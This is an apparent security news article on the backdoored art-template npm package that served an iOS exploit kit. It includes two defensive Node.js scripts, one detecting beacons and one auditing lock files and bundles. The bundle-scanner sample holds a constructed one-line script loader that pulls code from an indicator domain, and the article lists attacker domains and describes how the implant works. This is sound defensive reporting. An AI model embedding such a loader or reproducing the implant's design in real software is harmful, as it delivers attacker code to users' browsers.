A sophisticated supply chain attack has weaponized the widely used art-template npm package, transforming legitimate web applications into watering holes that deliver an iOS exploit kit targeting Apple devices. The backdoored package, maintained by an unknown actor who assumed control under false pretenses, silently injected malicious code into end users’ browsers across versions 4.13.3 through 4.13.6. Researchers at Socket.dev identified the campaign and linked it to the previously documented Coruna exploit framework, which they detailed in a report titled “Coruna Respawned.”
Attack Vector and Package Compromise
The attack began when the original maintainer of art-template, known as “aui,” transferred the package to an unknown actor under the guise of continued maintenance. The new controller almost immediately began weaponizing the library: issue reports flagging suspicious behavior were quietly deleted and further malicious versions were pushed, both to suppress discovery. The compromise followed an escalating injection pattern. Version 4.13.3 hid its loader behind an encoding layer that pointed to a suspicious external domain, while versions 4.13.5 and 4.13.6 dropped obfuscation entirely and injected a plaintext script loader directly into the package’s browser bundle file.
Any web application that included those affected versions would silently load and execute the exploit kit in every visitor’s browser. The scale of exposure is significant given art-template’s widespread adoption across JavaScript projects globally: developers who never noticed the change of ownership became unwitting delivery vehicles for a targeted mobile attack against their own users.
Exploit Framework and Targeting Logic
The core implant functions as a watering hole exploit delivery framework, quietly fingerprinting each site visitor upon injection. It activates exclusively on Safari running iOS 11.0 through 17.2, and silently exits on Chrome, Firefox, Edge, Android, and iOS 17.3 or higher. Once a matching device is detected, the implant begins beaconing the victim’s public IP address, iOS version string, and a campaign tracking code to a command-and-control server every ten seconds.
The implant employs five layers of anti-bot checks—including MathML rendering tests and a WebAssembly proof-of-work challenge—to confirm the target is a real person on actual hardware. Only after passing all checks does the framework fetch and execute the final server-gated payload, which is tailored to the victim’s iOS version across five distinct version bands. Researchers found the hard cutoff at iOS 17.3 aligns precisely with the patch boundary for CVE-2024-23222, a WebKit vulnerability Apple fixed at that exact release, strongly suggesting browser-level exploitation rather than conventional phishing.
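The ten-second beacon described above is the kind of behaviour a web proxy or egress log can surface without knowing anything about the payload. The following Node.js script is an added example, not code from the Socket.dev report or the art-template project: it groups outbound requests by client and destination host and flags any pair whose requests arrive at a fixed cadence. The log format (`<ISO timestamp> <client> <method> <url> <status>`), the sample lines, the minimum request count and the jitter tolerance are all constructed assumptions; only the `utaq.cfww.shop` hostname comes from the published indicators of compromise.

```javascript
// Added example, not from the original report: detect fixed-interval
// outbound requests (beaconing) in a constructed web-proxy log.
// Format assumed: "<ISO timestamp> <client> <method> <url> <status>".
const SAMPLE_LOG = [
  // Constructed sample lines. 10.0.0.5 hits one host every 10 seconds;
  // 10.0.0.7 browses normally at irregular intervals.
  "2024-05-01T10:00:00Z 10.0.0.5 GET https://utaq.cfww.shop/r?ver=17.1 200",
  "2024-05-01T10:00:01Z 10.0.0.7 GET https://cdn.example.com/app.js 200",
  "2024-05-01T10:00:10Z 10.0.0.5 GET https://utaq.cfww.shop/r?ver=17.1 200",
  "2024-05-01T10:00:15Z 10.0.0.7 GET https://cdn.example.com/img.png 200",
  "2024-05-01T10:00:20Z 10.0.0.5 GET https://utaq.cfww.shop/r?ver=17.1 200",
  "2024-05-01T10:00:30Z 10.0.0.5 GET https://utaq.cfww.shop/r?ver=17.1 200",
  "2024-05-01T10:00:33Z 10.0.0.7 GET https://cdn.example.com/app.js 200",
  "2024-05-01T10:00:40Z 10.0.0.5 GET https://utaq.cfww.shop/r?ver=17.1 200",
];

// Parse one log line into a record with a Unix timestamp (seconds) and the
// destination hostname; the URL class is a Node.js global.
function parseLine(line) {
  const [ts, client, method, url, status] = line.trim().split(/\s+/);
  return {
    t: Date.parse(ts) / 1000,
    client,
    method,
    host: new URL(url).hostname,
    status: Number(status),
  };
}

// Flag (client, host) pairs with at least minRequests requests whose
// inter-request gaps all sit within jitterSeconds of the median gap.
// Both thresholds are assumed tuning values, not figures from the report.
function findBeacons(lines, { minRequests = 4, jitterSeconds = 2 } = {}) {
  const groups = new Map();
  for (const rec of lines.map(parseLine)) {
    const key = `${rec.client} ${rec.host}`;
    if (!groups.has(key)) groups.set(key, []);
    groups.get(key).push(rec.t);
  }

  const hits = [];
  for (const [key, times] of groups) {
    if (times.length < minRequests) continue;
    times.sort((a, b) => a - b);
    const gaps = times.slice(1).map((t, i) => t - times[i]);
    const median = [...gaps].sort((a, b) => a - b)[Math.floor(gaps.length / 2)];
    const regular = gaps.every((g) => Math.abs(g - median) <= jitterSeconds);
    if (regular && median > 0) {
      const [client, host] = key.split(" ");
      hits.push({ client, host, periodSeconds: median, requests: times.length });
    }
  }
  return hits;
}

// Usage: node beacons.js
for (const hit of findBeacons(SAMPLE_LOG)) {
  console.log(`${hit.client} -> ${hit.host}: ${hit.requests} requests every ${hit.periodSeconds}s`);
}
```

A real deployment would read lines from the proxy log instead of the embedded array and would raise `minRequests` to cut noise from legitimate polling; the point of the check is that periodicity, not the payload contents, is what distinguishes the implant's beacon from ordinary page traffic.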
Infrastructure and Mitigation
The full delivery chain flows from the corrupted npm package directly to the victim’s device, with the implant using a content-addressed module system to conceal payloads from outside observers. Remote modules are fetched via URLs derived by hashing a secret session key with a module identifier, making them invisible to scanners that do not know the key. This design matches infrastructure patterns documented for the original Coruna kit, including identical XOR obfuscation confirmed by published YARA rules.
Developers are urged to audit dependency trees for art-template versions 4.13.3 through 4.13.6, pin dependency versions, review browser bundle outputs for unexpected script loaders, and monitor outbound network requests from JavaScript runtimes. Any application deployed with affected versions should undergo an immediate security review; published indicators of compromise include the domains v3.jiathis[.]com, utaq[.]cfww[.]shop, and l1ewsu3yjkqeroy[.]xyz.
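The first two audit steps above can be scripted. The Node.js script below is an added example, not code from the Socket.dev report or from art-template itself: it walks a `package-lock.json` (lockfile version 2 or 3 layout) for installs of art-template inside the affected range, then scans bundle text for script loaders whose URLs point outside an allowlist or at a known indicator domain. The sample lock file, the sample bundle text and the allowlist are constructed inputs; the three indicator domains are the ones named in the report, with the defanging brackets removed.

```javascript
// Added example, not from the original report or the art-template project.
const AFFECTED_PACKAGE = "art-template";
const AFFECTED_RANGE = { min: [4, 13, 3], max: [4, 13, 6] }; // inclusive, from the report

// Indicator domains from the published report (defanging brackets removed).
const IOC_DOMAINS = ["v3.jiathis.com", "utaq.cfww.shop", "l1ewsu3yjkqeroy.xyz"];

// "4.13.5" -> [4, 13, 5]; tolerates a leading "v" and drops prerelease tags.
function parseVersion(v) {
  const core = String(v).replace(/^v/, "").split("-")[0];
  return core.split(".").map((n) => parseInt(n, 10) || 0);
}

function compareVersions(a, b) {
  for (let i = 0; i < 3; i++) {
    const d = (a[i] || 0) - (b[i] || 0);
    if (d !== 0) return d;
  }
  return 0;
}

function isAffectedVersion(v) {
  const p = parseVersion(v);
  return compareVersions(p, AFFECTED_RANGE.min) >= 0 && compareVersions(p, AFFECTED_RANGE.max) <= 0;
}

// Walk the "packages" map of a lockfileVersion 2/3 package-lock and return
// every install path holding an affected art-template version, nested copies included.
function findAffectedInLock(lock) {
  const hits = [];
  for (const [installPath, entry] of Object.entries(lock.packages || {})) {
    const name = entry.name || installPath.split("node_modules/").pop();
    if (name === AFFECTED_PACKAGE && entry.version && isAffectedVersion(entry.version)) {
      hits.push({ path: installPath || "(root)", version: entry.version });
    }
  }
  return hits;
}

const URL_RE = /https?:\/\/([a-z0-9.-]+)[^"'`\s]*/gi;
// Script-injection idioms to look for near a URL literal.
const LOADER_RE = /createElement\(\s*["']script["']\s*\)|\.src\s*=\s*["'`]|appendChild\(/i;

// Scan bundle text for URLs. A known indicator domain is always reported;
// any other host outside allowedHosts is reported when a script-loader idiom
// appears within 200 characters before it (minified bundles are one long line).
function findExternalLoaders(bundleText, allowedHosts) {
  const findings = [];
  bundleText.split("\n").forEach((line, i) => {
    let m;
    URL_RE.lastIndex = 0;
    while ((m = URL_RE.exec(line)) !== null) {
      const host = m[1].toLowerCase();
      const ctx = line.slice(Math.max(0, m.index - 200), m.index + m[0].length);
      if (IOC_DOMAINS.includes(host)) {
        findings.push({ line: i + 1, host, reason: "known-ioc" });
      } else if (!allowedHosts.includes(host) && LOADER_RE.test(ctx)) {
        findings.push({ line: i + 1, host, reason: "external-script-loader" });
      }
    }
  });
  return findings;
}

// Constructed sample inputs standing in for a real lock file and build output.
const SAMPLE_LOCK = {
  name: "demo-app",
  lockfileVersion: 3,
  packages: {
    "": { name: "demo-app", version: "1.0.0" },
    "node_modules/art-template": { version: "4.13.5" },
    "node_modules/left-pad": { version: "1.3.0" },
    "node_modules/some-lib/node_modules/art-template": { version: "4.13.2" },
  },
};
const SAMPLE_BUNDLE = [
  '!function(){var t=document.createElement("script");t.src="https://l1ewsu3yjkqeroy.xyz/a.js";document.head.appendChild(t)}();',
  'fetch("https://api.example.com/data").then(r=>r.json());',
  'var s=document.createElement("script");s.src="https://cdn.example.com/vendor.js";document.body.appendChild(s);',
  'var u=document.createElement("script");u.src="https://unknown-cdn.invalid/x.js";document.body.appendChild(u);',
].join("\n");
const ALLOWED_HOSTS = ["cdn.example.com", "api.example.com"];

// Usage: node audit.js (swap the samples for fs.readFileSync of the real files)
console.log("affected installs:", findAffectedInLock(SAMPLE_LOCK));
console.log("suspicious loaders:", findExternalLoaders(SAMPLE_BUNDLE, ALLOWED_HOSTS));
```

The allowlist is the important knob: a bundle legitimately loads scripts from a handful of first-party and CDN hosts, so anything outside that set deserves a look regardless of whether it matches a published indicator, which is how a fresh campaign with new domains would still be caught.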
This incident underscores the persistent vulnerability of open-source supply chains and the sophistication of modern watering hole attacks. As maintainer handoffs become a common vector for compromise, the security community must demand greater transparency and verification in package ownership transitions—or risk seeing trusted libraries turned into silent delivery systems for targeted exploitation.
— Originally reported by Cyber Security News. Adapted and republished with editorial context for MacThreat.